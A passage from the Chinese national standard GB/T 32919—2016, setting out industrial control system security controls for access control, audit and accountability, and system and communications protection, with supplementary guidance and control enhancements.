除了安全状态外,应禁止ICS 访问【赋值:组织规定的、与安全有关的信息】; e) 在非安全的地方,加密或存储【赋值:组织定义的非在线的关键或敏感的信息】。 GB/T 32919—2016 B.16.4 信息流强制访问控制(AC-4) 控制: a) ICS 应按应用策略,执行控制系统中的信息流和系统间的信息流授权。 补充指导: a) 信息流控制规定了信息在系统内和系统间流转路径; b) 信息流控制策略和执行机制通常采用制定源和目的方式; c) 信息流控制通常基于信息和信息路径的特征; d) 该控制指导配置其他安全控制的授权; e) 相关安全控制:AC-3、AC-17、AC-19、AC-21、CM-6、CM-7、SA-8、SC-2、SC-5、SC-7、SC-18。 控制增强: a) ICS 应使用信息对象、源对象、目的对象等显式的安全属性,作为流控制决策的基础,执行信息 流控制; b) ICS 应使用受保护的过程域,作为流控制决策的基础,执行信息流控制; c) ICS 应基于特定策略,执行动态的系统信息流控制; d) 防止来自旁路的内容检测机制的加密数据; c) 执行【赋值:组织定义的在其他数据类型】中嵌入数据类型的限制; f) 执行元数据上的信息流控制; g) 使用硬件机制,执行【赋值:组织定义的信息流】控制; h) 使用【赋值:组织定义的安全策略】,执行信息流控制; 增强补充指导: 1) 【赋值:组织定义的安全策略过滤器】,应包括:欺诈词过滤器、文件类型检测过滤器、结构 化数据过滤器、非结构化数据过滤器、元数据内容过滤器、隐藏内容过滤器等; 2) 结构化数据可被应用和个体予以理解。 i) 当 ICS 不能做出信息流控制决策时,系统使用人对【赋值:组织定义的安全策略过滤器】进行 评审; j) 应为授权管理员提供了一种使用【赋值:组织定义的安全控制过滤器】的能力; k) 应为授权管理员提供了配置【赋值:组织定义的安全控制过滤器】的能力,以便支持不同安全 策略; 1) 在不同安全域间传送信息时,ICS 应按数据类型的规约和用法,标识信息流; m) 在不同安全域间传送信息时,ICS 应把信息分解为与策略有关的一些子部分; n) 在不同安全域间传送信息时,ICS 应把数据结构和内容限制为【赋值:组织定义的安全策略】需 求的策略过滤器; 增强补充指导: 1) 限制文件长度,限制允许的枚举,限制字符集,限制模式以及其他数据对象,这样可以减 少潜在恶意的范围,减少不被许可的内容。限制的例子包括但不限于:字符数据域仅包 含可打印的 ASCII; 字符数据域仪包含字母、数字;字符数据域不包含特定字符;基于【赋 值:组织定义的安全策略】,执行域的最大长度和文件长度。 o) 在不同安全域间传送信息时,ICS 应按安全策略检测不被许可的信息,并阻止传输这些信息; 增强补充指导: 1) 支持这一增强的措施有:检测所有传输的信息是否是恶意的;针对传输的信息,实现特定 词列表搜索;对元数据(例如:安全属性)应用以上同样的保护措施。 p) ICS 执行互连系统上信息的安全策略; 增强补充指导: 1) 在不同安全策略的互连系统间传输信息,可能存在破坏安全策略的风险。由于安全策略 的破坏不可能绝对地予以阻止,因此信息拥有者所提出的策略指导往往是在互连系统的 策略增强点上予以实现。 2) 当需要时,特定体系结构方案是强制的,以便减少可能没被发现的脆弱性。例如,体系结 构方案包括:禁止在互连系统之间信息传输(即:仅实现访问,单向传输机制);使用硬件 机制来执行单一信息流决策;实现完整测试、再分等机制,以便重新赋予安全属性以及相 关联的安全标记。 q) ICS 应逐一标识并鉴别信息传输源域和目的域;把安全属性和信息进行绑定,支持信息流策略 的实施;跟踪安全属性绑定以及信息传输相关联的问题。 B.16.5 职责分离(AC-5) 控制: 组织应: a) 在必要时,分离个体的职责,以便防止恶意活动; b) 建立职责分离文档; c) 通过 ICS 访问授权,实现分离的职责。 补充指导: a) 根据需要建立适当的职责分离来消除在个人职责方面的利益冲突。 b) 限制和控制特殊权限的分配和使用,根据用户的角色分配权限,实现用户的权限分离。如实 现管理用户、操作系统特权用户的权限分离。 c) 某些情况下,ICS 不合适或不支持实施职责分离,应记录不实施的原因,并选择使用合适的补 偿控制(例如,提供增强的人员安全和审计)。 d) 组织认真考虑单个个体执行多重关键角色的合适性。 e) 相关安全控制:AC-3 、PL-2。 控制增强:无 B.16.6 最小授权(AC-6) 控制: a) 组织应使用最小授权概念,只允许被授权的用户(和代表用户的过程)对完成所赋予的任务是 必要的且符合组织使命和业务的功能进行访问。 补充指导: a) 针对特定的职责和 ICS(包括特定的协议、端口和服务),利用最小特权的概念,依照必要的风 险评估来充分地降低运行、资产和个人的风险; b) 该控制定义的访问授权,是由AC-3 实现的; c) 组织依据风险评估,针对特定的职责和工业控制系统,使用最小授权这一概念,目的是为了准 确地缓解组织运行和资产、个体其他组织和国家的风险; d) 仅授予管理用户所需的最小权限; e) 在 ICS 不支持特权区分的情况下,组织应按裁减指导,选择使用合适的补偿控制(例如,提供增 强的人员安全和审计); f) 组织应认真考虑单个个体执行多重关键特权的合适性; g) 相关安全控制:AC-2、AC-3、AC-5 、CM-6、PL-2。 控制增强: a) 组织应显式地对【赋值:组织定义的安全功能】(硬件、软件和固件中所开发的安全功能)和安全 有关的信息列表授予访问权。 增强补充指导: 1) 安全功能的例子有:建立系统账户,配置访问授权(即允许,特权),设置要审计的事件以及 设置入侵检测参数。 2) 显式地被授权的人员,例如有:安全管理员、系统和网络管理员、系统安全官员、系统维护 人员、系统程序设计人员和其他被赋予特权的用户。 b) 组织要求系统具有访问【赋值:组织定义安全功能和安全有关的信息列表】的ICS 账户的用户 或角色,当访问其他系统功能时,使用非授权的账户或角色,并且对于这样的功能,如果方便 的话,审计任意对授权账户或角色的使用。 c) 组织按【赋值:运行需要而定义的授权要求】,授权网络访问,并在安全计划中为这样访问记录 理由。 d) ICS 提供分离的过程域,以便能精细地分配用户授权。 e) 组织限定指定的系统管理人员,向ICS 的超级用户账户授权。 增强补充指导: 1) 超级用户账户一般被描述为市场上不同类型现成操作系统的“根”或“管理员”。 2) 限制系统授权的例子有:在配置组织的 ICS 时,对于那些H 常工作的用户就不授予访问超 级用户账户的权利。 3) 在这一增强控制中的应用中,组织可以区分为本地 ICS 账户所赋予的权利和为域账户所 赋予的权利。其中域账户是由组织提供的.从而可仍然能控制系统针对关键安全参数的 配置,以及为了充分缓解风险所必要的其他配置。 f) 组织应禁止向组织之外的用户授权访问ICS。 B.16.7 失败登录控制(AC-7) 控制: a) ICS 应在【赋值:组织定义的时间周期】内,按【赋值:组织定义的次数】,限制用户连续无效的访 问尝试; b) 自动按【赋值:组织定义的时间周期】,锁死账户,直到管理员予以释放; c) 当未成功尝试超出最大次数时,依据【赋值:组织定义的延迟算法】,延迟下一次登入执行。 补充指导: a) 由于可能存在服务拒绝,因此在【赋值:组织定义的时间周期】后,自动锁死通常是临时的,并可 能自动释放; b) 如果要选择延迟算法,那么组织应基于部件的能力,为不同的ICS 选择使用不同的算法; c) 对不成功登人尝试的响应,可以通过系统或通过应用层予以实现; d) 某些情况下,ICS 不支持账号、节点锁定、延迟登录,或存在重大的负面性能影响,组织应按裁 减指导,选择使用合适的补偿控制(例如,建立日志或记录所有不成功的登录尝试,当组织定义 的数个连续的无效访问尝试予以执行时,通过报警或其他手段,警示ICS 的安全人员); e) 相关安全控制:MP-5 、MP-6 、SC-13。 控制增强: a) 系统自动锁死账户或节点,直到不成功尝试超出最大次数时才予以释放; b) 系统为插入在ICS 中的移动设备提供附加的保护,即在【赋值:组织定义的连续不成功登入】 尝试后,净化来自移动设备的信息。 B.16.8 系统使用提示(AC-8) 控制: a) 设置鉴别警示信息,在允许用户访问前,显示经过批准的、校准过的通告信息,并保持在屏幕 上,直到用户采取了明确的行动。 补充指导: a) 显示只有授权的用户才能访问计算机的一般性的告警通知。 b) 描述未授权访问可能导致的后果。 c) 在 ICS 不支持系统使用提示的情况下,组织应按裁减指导,使用合适的补偿控制(例如,在ICS 设施上公布物理通告)。 d) 相关安全控制:PL-2。 控制增强:无 B.16.9 以前访问提示(AC-9) 控制: a) ICS 应通知成功登入(访问)的用户,以及最后一次登入的日期和时间。 补充指导: a) 期望该控制覆盖两个方面:传统的系统登入以及以其他类型的结构化配置(例如,面向服务的 体系结构)而出现的对 ICS 的一般性访问。 b) 在该 ICS 不支持以前访问提示的情况下,组织按裁减指导,使用合适的补偿控制。 控制增强: a) ICS 通知成功登入/访问的用户,以及自最后一次成功登入/访问以来未成功登入/访问尝试的 次数; b) ICS 通知在【赋值:组织定义的时间周期】内,选择:成功登入/访问;未成功登入/访问的尝试的 用户和次数; c) ICS 通知在【赋值:组织定义的时间周期】内,对用户账户的安全设置改变的用户。 B.16.10 并发会话控制(AC-10) 控制: a) ICS 按【赋值:组织定义的当前会话数】,限制每一系统账户的当前会话数量。 补充指导: a) 对于整个 ICS 的账户,组织可通过账户类型或账户组合,定义当前最大会话数量。 b) 该控制强调了对一个给定 ICS 账户的当前会话,并没有强调单个用户通过多系统账户的当前 会话。 c) 在 ICS 不支持并发会话控制的情况下,组织应按裁减指导,使用合适的补偿控制(例如,提供更 强的审计措施)。 d) 相关安全控制:PL-2。 控制增强:无 B.16.11 会话锁定(AC-11) 控制: a) ICS 应在【赋值:组织定义的不活动时间周期】后,或接受的用户请求,通过会话锁,禁止对系统 进一步访问; b) 应保持会话锁,直到用户通过标识和鉴别规程,重新建立访问。 补充指导: a) 会话锁定是当用户停止工作,离开 ICS 所采取的一种临时措施,但并不希望中断会话;ICS 使 用会话锁定以防止访问已规约的工作站或节点; b) 组织可以在操作系统层或应用层实现这会话锁; c) 会话锁定不能替代断开系统登人; d) ICS 在指定的工作站和节点所【赋值:定义的时间段】后,自动激活会话锁定 e) 在某些情况中,不建议为ICS 操作员的工作站/节点设立会话锁定(例如,当在紧急情况中需要 操作员即可予以响应的话); f) 在 ICS 不支持会话锁定的情况下,组织按裁减指导,使用合适的补偿控制(例如,提供更强的物 理安全、人员安全以及审计措施); g) 相关安全控制:AC-7 、PL-2。 控制增强: a) 当在具有显示屏的设备上启动ICS 会话锁机制时,该机制应以公共可观察的模式放在相关联 的显示屏上,隐藏该屏幕上以前可见的信息。 B.16.12 会话终止(AC-12) 控制: a) 在【赋值:组织定义的条件或需要终止会话的事件】触发时自动终止用户会话。 补充指导: a) 该控制终止用户端发起的逻辑会话,而 SC-10 终止物理会话,如:网络连接; b) 会话终止与用户的逻辑会话相关的所有进程,除非是由用户(即会话所有者)在会话结束后继 续运行的特定进程; c) 需要自动终止会话的条件或事件包括:组织定义的用户活动期间,特定类型的事件,限制使用 时间等; d) 相关安全控制:SC-10。 控制增强: a) ICS 应提供用户端发起会话的退出能力,无论是否认证后获得【赋值:组织定义的信息资源】; b) ICS 应向用户显式地提示会话已被安全终止。 B.16.13 未标识鉴别的许可行为(AC-13) 控制: 组织应: a) 在 ICS 内设置未标识鉴别用户的特定行为动作; b) 在 ICS 安全规程中记录并说明不需要进行标识鉴别用户动作的原因。 补充指导: a) 该控制主要用于某些特定情况下,不需进行标识和鉴别即可操作 ICS; b) 组织应允许有限数量的不需要进行标识和鉴别的操作 c) 组织也可以标注出那些通常需要标识和鉴别,在紧急情况下,可以绕过标识和鉴别的行为; d) 相关控制:CP-2 、IA-2。 控制增强: a) 无需标识和鉴别的组织许可行为仅用于实现组织业务目标。 GB/T 32919—2016 B.16.14 远程访问(AC-14) 控制: a) 组织应授权、监督和控制所有对ICS 的远程访问。 补充指导: a) 只有在必要时,并经过批准和认证的情况下才可以进行远程访问; b) 远程访问要采取多因素认证; c) 在 ICS 没有实现这一控制的任何或所有部件的情况下,组织按裁减指导,使用其他机制或规程 作为一个补偿控制; d) 相关安全控制:AC-2、AC3、AC-18、AC-19、AC-20、CA-3、CA-7、CM-8、IA-2、IA-3、IA-8、MA- 4、PE-17、PL-4、SC-10、SI-4。 控制增强: a) 组织利用自动机制来监督和控制远程访问方式;部分ICS 可能不支持远程访问; 增强补充指导: 1) 在 ICS 不支持使用自动化机制来监控远程访问的情况下,组织按裁减指导,使用非自动化 机制或规程作为补偿控制。 b) 利用密码技术来保护远程访问会话的机密性和完整性,防止鉴别信息在网络传输过程中被窃 听和篡改; 增强补充指导: 1) 相关密码技术的采用绝对不能影响 ICS 正常运行; 2) ICS 的安全目的通常按可用性、完整性和保密性这一次序的优先级。在认真考虑安全需 要以及有关系统性能的潜在结果的基础上,确定要使用的密码技术; 3) 在 ICS 不支持使用密码机制来保护远程会话保密性和完整性的的情况下,或由于对安全 (safety) 、性能或可靠性具有重大的负面影响,或 ICS 部件不能使用密码机制的情况下, 组织按裁减指导,使用合适的补偿控制(例如,为远程会话提供更强的审计,或限制关键 人员远程访问特权)。 c) ICS 通过【赋值:组织定义的访问控制点的数目】,路由所有远程访问; d) 组织仅迫于运行方面的要求,授权执行远程访问并访问与安全有关的信息,远程授权访问要 在工业控制系统安全计划中记录其理由; e) 工业控制系统使用鉴别和加密技术保护对系统的无线访问; f) 组织监控对工业控制系统的授权远程访问,包括按【赋值:组织定义的时间间隔】,扫描未授权 的无线访问点; g) 对那些不期望使用的无线访问,在工业控制系统部件中嵌入的内部无线网络发挥作用或部署 前,组织应关闭或取消其功能; h) 组织应禁止用户独自配置无线网络; i) 组织确保用户保护了有关远程访问的信息,以免造成未授权的使用和信息泄露; j) 组织确保远程访问【赋值:组织定义的安全功能和安全有关信息的列表】的会话,使用了附加的 【赋值:组织定义的安全措施】,并进行了相应的审计; k) 除了特定运行需求所显式标识的部件外,组织应断掉工业控制系统中点对点无线网络的 能力; 1) 除了特定运行需求所显式标识的部件外,组织断掉被认为是不安全的网络协议。 GB/T 32919—2016 B.16.15 无线访问(AC-15) 控制: 组织应: a) 建立无线访问使用规范; b) 监控对 ICS 的无线访问; c) 强化对无线访问需求管理,如非必须,关闭无线访问。 补充指导: a) 无线技术包括但不限于:802.11x、蓝牙、微波等; b) 无线网络使用提供凭证保护和相互验证等功能协议,如 EAP/TLS、PEAP 等; c) 某些情况下,无线信号可能辐射到组织控制以外区域; d) 相关安全控制:AC-2、AC-3、CM-8、IA-2、PL-4、SI-4。 控制增强: a) 使用基于【选择:用户和/或设备】的认证和加密技术保护无线接入ICS; b) 组织监测未经授权的无线连接,包括扫描未经授权的无线接入点,对发现的未经授权的连接 采取适当的措施; c) 必要时,组织应禁止ICS 组件内部嵌人式无线网络功能; d) 组织应禁止用户自主配置无线网络功能; e) 组织应管制控制范围内的无线网络。 B.16.16 移动设备的访问控制(AC-16) 控制: 组织应: a) 建立移动设备使用规范; b) 授权移动设备连接到 ICS 应满足组织规范要求; c) 监控非授权移动设备接人 ICS; d) 强化移动设备接入 ICS 需求管理; e) 禁用ICS 自动执行移动设备可执行代码功能; f) 对到组织认为存在风险的区域的个人发放特殊配置的移动设备; g) 对到组织认为存在风险的区域的进行检查或维护的移动设备采用领取归还方式。 补充指导: a) 移动设备包括但不限于:移动硬盘、USB 设备、笔记本电脑、智能手机等; b) 组织控制的移动设备包括:组织内部设备,组织有权要求提供特定安全要求的设备; c) 移动设备的使用规范包括:配置管理、认证和授权、实施强制性保护软件、扫描设备的恶意代 码、更新防病毒软件、扫描关键软件更新和修补程序、进行操作系统和其他常驻软件完整性检 查、禁用不必要的硬件等; d) 组织移动设备带出和返还策略包括:确定关注点、定义设备所需配置、带出前检查和返还后检 查等; e) 在 ICS 没有实现这一控制的任何或所有部件的情况下,组织按裁减指导,使用其他机制或规程 作为补偿控制; f) 相关控制包括:AC-3、AC-7、AC-18、AC-20、CA-9、CM-2、IA-2、IA-3、MP-2、MP-4、MP-5、PL- 4、SC-7、SC-43、SI-3、SI-4。 控制增强: GB/T 32919—2016 a) 组织应限制 ICS 内可读写、可移动设备的使用; b) 组织应禁止 ICS 内使用个人所有的可移动设备; c) 组织应禁止 ICS 内使用末标记的可移动设备; d) 组织应禁止在涉密系统中使用非涉密移动设备; e) 组织采用【选择:全设备加密、容器加密】来保护【赋值:组织定义的移动设备】信息的机密性和 完整性; f) 组织应考虑关闭不用的或不必要的I/O 端口; g) 组织应禁止使用移动设备中的无线功能。 B.16.17 外部系统的使用(AC-17) 控制: 组织应建立一些术语和条件,允许授权个体: a) 从外部访问工业控制系统; b) 使用外部系统处理、存储和传输组织信息。 其中,所建立的术语和条件,要与其他组织所拥有的、运行的、维护的外部系统所建立的任何可信关 系是一致的。 补充指导: a) 外部系统是组织边界外的系统,通常组织对这些系统的安全性不具体控制; b) 外部系统包括个人或其他组织拥有的系统和设备; c) 相关安全控制:AC-3、AC-14、CA-3、PL-4、SA-9。 控制增强: a) 组织应禁止授权的个体使用外部系统来访问工业控制系统,或处理、存储、传输组织收集的信 息,除非存在以下情况: 1) 可以验证外部系统上所要求的安全控制的实现,像组织工业控制系统安全策略和安全计 划中所规约的那样; 2) 已批准了工业控制系统与外部系统的连接,或批准了组织内实体使用外部系统进行处理 的协议。 b) 组织对授权个体有关使用外部信息系统上组织控制的可移动媒介,施加一些限制。 B.16.18 信息共享(AC-18) 控制: 组织应: a) 促进信息共享,并监控授权用户是否按【赋值:组织定义的共享策略】将信息共享给其他用户; b) 采用【赋值:组织定义的自动化机制或手动过程】,以帮助用户在决策信息共享。 补充指导: a) 相关安全控制:AC-3。 控制增强: a) 信息共享|自动决策支持 ICS 基于共享伙伴的访问权限和被共享信息的共享属性来执行自动共享决策。 b) 信息共享|信息检索 ICS 执行【赋值:定义组织信息共享的限制】来实现信息检索服务。 GB/T 32919—2016 B.17 审计与问责(AU) B.17.1 审计与问责策略和规程(AU-1) 控制: 组织应: a) 制定并发布正式的安全审计策略,内容包括目的、范围、角色、责任、管理承诺、组织实体之间的 协调关系以及依从关系等; b) 制定并发布正式的安全审计章程,以推动审计和可核查性方针策略及与相关安全控制的 实施; c) 按【赋值:组织定义的时间间隔】,对审计和可核查性方针策略及规程进行评审和更新。 补充指导: a) 安全审计策略和章程应与相关的法律、可执行命令,指令、策略、规则及标准相一致。 b) 安全审计策略可以包含在组织的通用信息安全策略中,作为其一部分。 c) 相关安全控制:PM-9。 控制增强:无 B.17.2 审计事件(AU-2) 控制: a) 组织应明确规定审计事件范围和审计内容。审计范围应覆盖到 ICS 的每个用户,审计内容应 包括重要用户行为、系统资源的异常使用和重要系统命令的使用等系统内重要的安全相关 事件。 补充指导: a) 安全审计的目的是为了记录那些与 ICS 安全相关的重要的审计事件,应该指明哪些ICS 部件 需要执行审计行为; b) 现场设备审计事件应包括:用户登录、退出事件,连接超时事件,配置变更,时间/日期变更,审 计接入,ID/ 密码创建和修改等; c) 审计行为会影响 ICS 的效率,因此,应该基于风险评估确定哪些事件需要进行常规审计,哪些 事件需要相应于特殊环境的审计; d) 大多数 ICS 的审计发生在应用层上; c) 相关安全控制:AC-6、AU-3、MA-4、MP-2、SI-4。 控制增强: a) 应提供编辑审计记录的能力,这些记录来自多重部件,这些部件遍布于系统的逻辑层面、物理 层面及相关于时序的审计痕迹中; b) 提供对审计事件选择的集中管理能力,事件选择被单独的系统部件所审计; c) 组织应定义审计事件进行【赋值:组织定义的时间间隔】的审核和升级。 B.17.3 审计记录的内容(AU-3) 控制: a) 审计记录应包含足够的信息,以便确定什么事件发生了、事件的来源、事件的结果等。 补充指导: a) 审计记录应包括事件的日期、时间、类型、主体标识、客体标识和结果等。 b) 相关安全控制:AU-2 、AU-8。 GB/T 32919—2016 控制增强: a) 审计记录应使用主题、类型、位置等信息标识审计事件; b) 组织应集中管理审计内容。 B.17.4 审计存储能力(AU-4) 控制: a) 组织应规定【赋值:审计记录的保存期限】,并保证审计记录的存储空间。 补充指导: a) 为方便安全事故提供事后调查和满足信息保留要求和规定,应在指定时间内保存审计记录,直 到这些记录不会被行政、法律、审计或者其他操作目的所使用。审计记录和报表保存时间应不 少于三个月,现场设备应至少支持2048个事件记录; b) 应分配足够的审计记录存储空间,减少空间不足的可能性; c) 相关安全控制:AU-2、AU-5、AU-6、AU-7。 控制增强:无 B.17.5 审计失效响应(AU-5) 控制: ICS应: a) 对于审计处理失效的事件,向【赋值:组织定义的人员】报警; b) 采取赋值:【选择:组织定义的动作】,例如:停止系统的运行,重写原有的审计记录,停止生成 新的审计记录等。 补充指导: a) 审计处理失效包括软硬件错误、审计获取机制失败、审计存储空间达到或超出极限等; b) 组织可针对不同审计处理失效(例如,由于类型、位置、严重程度或这些因素的组合),选择定 义附加的措施; c) 该控制应用于每个审计数据存储库(即存储审计记录的 ICS 部件),应用于组织的整个审计存 储能力(即组合了所有审计数据存储库); d) 一般地,不能在ICS 上执行审计记录的处理,而在隔离的信息系统上进行处理; c) 在 ICS 不支持审计的情况下,包括对审计失效的响应,组织应按裁剪指导,使用合适的补偿控 制(例如,在隔离的信息系统上提供审计能力); f) 相关安全控制:AU4 、SI-12。 控制增强: a) 对审计处理失效|审计存储能力的响应 在【赋值:组织定义的时间段】内,当分配给审计记录的存储量达到【赋值:组织定义的最大审计记录 存储容量】的某一百分比时,ICS 向【赋值:组织定义的人员、角色或岗位】提供一个警示。 b) 对审计处理失效|实时报警的响应 当【赋值:组织定义的、要求实时报警的审计失效事件】发生时,ICS 在【赋值:组织定义的实时报警 时间段】内,向【赋值:组织定义的人员,角色和岗位】发出报警。 c) 对审计处理失效|可配置的流量阈值的响应 ICS 执行可配置的流量阈值,反映对审计能力的限制,并【选择:拒绝、延迟】网络流量超出这些 阈值。 d) 对审计处理失效|失效宕机的响应 当发生【赋值:组织定义的审计事件】发生时,ICS 调用【选择:完全宕掉系统,部分宕掉系统;降低运 行模式,仅具有有限可用的业务处理能力】,除非存在一种可选的审计能力。 B.17.6 审计信息的监控、分析和报告(AU-6 ) 控制; a) 组织应按【赋值:组织定义的时间间隔】对审计记录数据进行分析,并生成审计报告。 补充指导: a) 应按【赋值:组织定义的时间间隔】的回顾、分析审计记录,这些记录包含了不恰当或不寻常的 行为; b) 调查可疑行为和入侵行为; c) 生成审计报表,并向相关人员报告这些事件,同时采取必要的措施; d) 相关安全控制:AC-2 、AC3 、AT-3 、AU-7 、CM-5。 控制增强: a) 采用自动的机制,将审计监控、分析、报告联结成一个完整的审计过程; b) 采用自动的机制,对存在安全隐患的不安全或者异常行为向安全人员发出警告。 B.17.7 审计简化和报告生成(AU-7) 控制: a) 提供审计简化和报告生成能力。 补充指导: a) 审计简化和报告生成能力,可有效支持 AU-6 中所描述的及时的审计评审、分析和报告需求, 支持安全事件之后的事实研究; b) 审计简化和报告工具并不警示原始的审计纪律; c) 审计简化和报告生成一般不在 ICS 上执行,而在隔离的信息系统上进行; d) 在某些情况下,ICS 不支持审计简化和报告生成,组织应按裁剪指导,使用合适的补偿控制(例 如,在隔离的信息系统上提供审计能力); e) 相关安全控制:AU-6。 控制增强: a) ICS 基于可选的事件准则,为关切的事件提供自动化处理审计记录的能力。 B.17.8 时间戳(AU-8) 控制: a) 应使用内部时钟,为审计记录生成时间戳。 补充指导: a) 由 ICS 生成的审计事件应包括日期和时间等时间信息。 b) 相关安全控制:AU-3。 控制增强: a) ICS 按【赋值:组织定义的时间间隔】,同步内部系统时钟。 B.17.9 审计信息保护(AU-9) 控制: a) 应保护审计信息和审计工具,避免受到未授权访问、修改、删除或覆盖等行为的破坏。 补充指导; a) 审计信息包括审计 ICS 行为的所有信息,包括审计记录、审计设置、审计报告等。 GB/T 32919—2016 b) 相关安全控制:AC-3、AC-6、MP-2、MP-4、PE-2。 控制增强: a) ICS 在所执行的硬件上,在一次性写人的媒介上生成审计记录; b) ICS 按【赋值:组织定义的时间间隔】,把审计记录反馈到一个与被审计系统不同的系统或媒 介上; c) ICS 使用加密机制来保护审计记录和审计工具的完整性; d) 组织对访问审计功能的授权,只限制为一个具有特权的用户子集;保护审计记录的非本地访 问,仅为授权的账户,并执行授权的功能。 B.17.10 抗抵赖(AU-10) 控制: a) 应防止个体否认执行过一个特定的动作。 补充指导: a) 审计信息包括审计ICS 行为的所有信息,包括审计记录、审计设置、审计报告等。 b) 相关安全控制:SC-12 、SC-8。 控制增强: a) ICS 在所执行的硬件上,在一次性写入的媒介上生成审计记录; b) ICS 按【赋值:组织定义的时间间隔】,把审计记录反馈到一个与被审计系统不同的系统或媒 介上; c) ICS 使用加密机制来保护审计记录和审计工具的完整性; d) 组织对访问审计功能的授权,只限制为一个具有特权的用户子集 e) 保护审计记录的非本地访问,仅为授权的账户,并执行授权的功能。 B.17.11 审计信息保留(AU-11) 控制: a) 组织应按【赋值:组织定义的时间长度】保留审计记录,提供事件方式时回顾、分析支持。 补充指导: a) 组织保留审核记录,直至确定不再需要; b) 审计记录通常根据事件发生时所采取的动作和响应过程进行分类; c) 相关安全控制:AU-4 、AU-5。 控制增强:无 B.17.12 审计生成(AU-12) 控制: a) ICS 应提供可审计事件的审计记录的生成能力; b) 应允许【赋值:组织定义的人员或角色】对特定组件可审计事件进行审计; c) 应对 AU-2 定义的事件按照 AU-3 所需的内容生成审计记录。 补充指导: a) ICS 组件均应可以对事件生成审计记录; b) 生成的审计日志应是一组事件列表; c) 生成的审计日志通常是一个事件的子事件; d) 在 ICS 不支持使用自动化机制来生成审计记录的情况下,组织应按裁剪指导,使用非自动化 的机制或规程作为一个补偿控制; e) 相关安全控制:AC-3、AU-2、AU-3、AU-6、AU-7。 控制增强: a) 应按时间相关将审计记录从【赋值:组织定义的系统组件】转换为系统的(逻辑或物理)审计跟 踪记录; b) 应产生系统的(逻辑或物理)审计跟踪记录的标准化格式; c) 提供在【组织内定义的时间范围】内,进行ICS 审核的能力。 B.18 系统与通信保护(SC) B.18.1 系统与通信保护策略和规程(SC-1) 控制: 组织应: a) 制定并发布正式的系统与通信保护策略,其中应包含日的、范围、角色、责任、管理承诺、各部门 间的协调以及合规性; b) 按【赋值:组织定义的时间间隔】,对系统与通信保护策略和规程进行评审和调整。 补充指导: a) 期望通过该控制,为有效实现该族中的安全控制和安全控制增强,编制所需要的策略和规程。 b) 该策略和规程应与应用的法律、法规、规章、制度、政策、标准和指南是一致的。 c) 系统与通信保护策略可作为组织信息安全策略的一部分。 d) 系统与通信保护规程可针对一般性的安全程序予以开发;当需要时,也可针对特殊 ICS 予以 开发。 e) 在开发系统与通信保护策略中,组织的风险管理策略是一个重要的因素。 控制增强:无 B.18.2 应用分区(SC-2) 控制: a) ICS 应能分离用户功能和系统管理功能。 补充指导: a) ICS 管理功能,例如管理数据库、网络部件、工作站或服务器所必要的功能,并一般需要授权用 户的访问。 b) 用户功能与系统管理功能的分离,或是逻辑的,或是物理的,并可通过使用不同的计算机、不 同的集中处理单元、不同的操作系统、不同的网络地址等方法实现,以及通过这些方法的组合 或其他合适的方法。 c) 在 ICS 没有把用户功能与信息系统管理职能予以隔离的情况下,组织应按裁剪指导,使用补偿 控制(例如,提供更强的审计措施)。 d) 相关安全控制:SA-4 、SA-8 、SC-3。 控制增强: a) ICS 禁止在一般(即非授权)用户的接口上,渗透与ICS 管理有关的功能。 增强补充指导: 1) 期望通过该控制增强确保管理选择对一般用户是不可用的。例如,不给出管理选择,直到 用户依据管理授权已合适地建立了一个会话。 GB/T 32919—2016 B.18.3 安全功能隔离(SC-3) 控制: a) ICS 应能隔离安全功能和非安全功能。 补充指导: a) 通过隔离边界的手段(以划分和域来实现之),ICS 可以隔离安全功能和非安全功能,控制对执 行这些安全功能的硬件、软件和固件的访问,并保护其完整性。 b) ICS 为每一个执行的过程,维护一个隔离的执行域。 c) 在 ICS 不支持安全功能隔离的情况下,组织应按裁剪指导,使用补偿控制(例如,提供更强的审 计措施,限制网络连接)。 d) 相关安全控制:AC-3、AC-6、SA-4、SA-5、SA-8、SA-13、SC-2、SC-7。 控制增强: a) ICS 实现基本的硬件隔离机制,以支持安全功能的隔离。 b) ICS 把执行访间控制策略和信息流控制策略的安全功能与非安全功能隔离开来,与来自其他 安全功能隔离开来。 c) ICS 实现隔离边界,最小化包含安全功能的边界内所涉及的非安全功能。 d) 组织把安全功能实现为一些相对独立的模块,避免模块之间存在不必要的接口。 e) 组织把安全功能实现为一个层次结构,最小化设计层次之间的接口,并避免高层在功能或正确 性方面依赖低层。 B.18.4 共享资源中的信息(SC-4) 控制: a) ICS 应禁止通过共享的系统资源进行未授权的、无意的信息传输。 补充指导; a) 通过该控制,可禁止以前用户/角色的动作所产生信息,包括信息的加密表示,在资源释放回信 系统之后,对当前获得对一个共享的资源访问的任意用户/角色(或当前过程)是可用的。即控 制共享资源中的信息,其中涉及客体复用问题。 b) 相关安全控制:AC-3 、AC-4 、MP-6。 控制增强: a) ICS 没有诸如内存、输人/输出队列、网络接口卡等共享资源,而这些在不同安全层上的资源仅 用于与系统运行的接口。 B.18.5 拒绝服务防护(SC-5) 控制: a) ICS 应防止或抵御【赋值:组织定义的拒绝服务攻击类型列表】中的拒绝服务攻击。 补充指导: a) 边界保护设备可过滤一定类型的包,以保护组织内部网络上的设备,免遭受到拒绝服务攻击的 直接影响。使用组合的增大容量和带宽以及服务容余,可减少遭受某些拒绝服务攻击的影响。 b) 相关安全控制:SC-6 、SC-7。 控制增强; a) ICS 限制用户针对其他ICS 或网络,发起拒绝服务攻击的能力。 b) ICS 为了限制拒绝服务攻击的信息泛滥之影响,管理多余的能力、带宽或其他容余。 c) ICS 安全失效。 GB/T 32919—2016 增强补充指导: 1) 所谓安全失效是一种条件,可通过应用一组系统机制来实现,以确保在管理接口上的边界 保护设备(例如:路由器,防火墙,门禁,以及驻留在受保护的通用子网上被称为非军事区 或 DMZ的应用网关),在其运行失效的事件中,没有互连系统之外的信息进入该系统。 2) 运行失效可能与任何一个过程、设备或机制是有关系的。 3) 边界保护设备的任何一个失效,均不能导致或引起该保护设备之外的信息进入该设备,也 不可能失效地允许未授权的信息释放。 B.18.6 资源优先级(SC-6) 控制: a) ICS 应能通过优先级来控制资源使用。 补充指导: a) 优先级保护有助于防止低优先级过程延迟或干扰ICS 服务于高优先级的过程。 b) 该控制并不适用于ICS 中那些只有单一用户/角色的部件。 控制增强:无 B.18.7 边界保护(SC-7) 控制: a) 组织应监视并控制在系统边界上的通信,以及系统内关键的边界上的通信; b) 连接外部网络或ICS, 应通过得到管理的、并与组织安全体系结构所安排的边界保护设备相一 致的接口。 补充指导: a) 限制外部信息流仅能流向管理接口中组织的服务器,并禁止外部流量似乎欺诈一个内部地址。 